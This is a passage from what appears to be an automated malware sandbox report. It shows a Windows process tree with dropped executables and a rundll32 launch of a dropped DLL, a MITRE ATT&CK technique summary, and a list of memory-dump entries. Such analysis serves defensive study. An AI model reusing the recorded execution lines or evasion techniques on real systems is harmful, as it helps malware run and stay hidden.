                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                        PID:7812
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:7140
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:6068
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:10708
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:11388
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                              PID:5772
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:11616
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:11396
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:12052
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:4192
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:6628
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:6280
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:12088
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:7484
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:11656
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:8436
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:8724
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:9032
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\C4E9.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\C4E9.exe
                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:6552
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:11756
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Bot_bottov768674.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Bot_bottov768674.exe"
                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:5796
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11564
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:10660
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10700
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9152
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:9196
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10960
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:308
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7880
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11644
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10524
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10820
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2384
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11040
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5868
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:11948
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5904
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5312
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11248

                                                                                                                                                                                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                                                                                                                                                                                              Initial Access

                                                                                                                                                                                                                                                                                                                                                                                                                                              Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                              BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1197

                                                                                                                                                                                                                                                                                                                                                                                                                                              Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1031

                                                                                                                                                                                                                                                                                                                                                                                                                                              New Service

                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1050

                                                                                                                                                                                                                                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1060

                                                                                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                                              New Service

                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1050

                                                                                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                              BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1197

                                                                                                                                                                                                                                                                                                                                                                                                                                              Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1089

                                                                                                                                                                                                                                                                                                                                                                                                                                              File Deletion

                                                                                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1107

                                                                                                                                                                                                                                                                                                                                                                                                                                              Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1130

                                                                                                                                                                                                                                                                                                                                                                                                                                              Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                              6
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                              Web Service

                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1102

                                                                                                                                                                                                                                                                                                                                                                                                                                              Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                                                              Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1081

                                                                                                                                                                                                                                                                                                                                                                                                                                              Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1120

                                                                                                                                                                                                                                                                                                                                                                                                                                              Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                              8
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                              Security Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1063

                                                                                                                                                                                                                                                                                                                                                                                                                                              Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1518

                                                                                                                                                                                                                                                                                                                                                                                                                                              System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                              8
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                              Lateral Movement

                                                                                                                                                                                                                                                                                                                                                                                                                                              Collection

                                                                                                                                                                                                                                                                                                                                                                                                                                              Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1005

                                                                                                                                                                                                                                                                                                                                                                                                                                              Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                                              Web Service

                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1102

                                                                                                                                                                                                                                                                                                                                                                                                                                              Exfiltration

                                                                                                                                                                                                                                                                                                                                                                                                                                              Impact

                                                                                                                                                                                                                                                                                                                                                                                                                                              Inhibit System Recovery

                                                                                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                                                                                              T1490

                                                                                                                                                                                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/340-364-0x0000016A35E60000-0x0000016A35ED2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                456KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/860-225-0x0000000000400000-0x0000000002D9C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                41.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/860-216-0x00000000001D0000-0x00000000001D9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                36KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/912-400-0x00000188F5160000-0x00000188F51D2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                456KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/1056-399-0x00000229D4670000-0x00000229D46E2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                456KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/1188-418-0x000001D1D6800000-0x000001D1D6872000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                456KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/1244-422-0x000001FD461D0000-0x000001FD46242000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                456KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/1408-410-0x0000021311640000-0x00000213116B2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                456KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/1552-282-0x0000000000FB0000-0x0000000000FB1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/1552-328-0x00000000032E0000-0x00000000032E1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/1552-272-0x0000000077BB0000-0x0000000077D3E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/1552-292-0x0000000005B40000-0x0000000005B41000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/1712-263-0x00000000012A0000-0x00000000012A1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/1712-257-0x0000000002D20000-0x0000000002D21000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/1712-251-0x0000000001290000-0x0000000001291000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/1712-254-0x000000000A680000-0x000000000A6BE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                248KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                                                                                              • memory/1712-243-0x00000000009D0000-0x00000000009D1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                Filesize

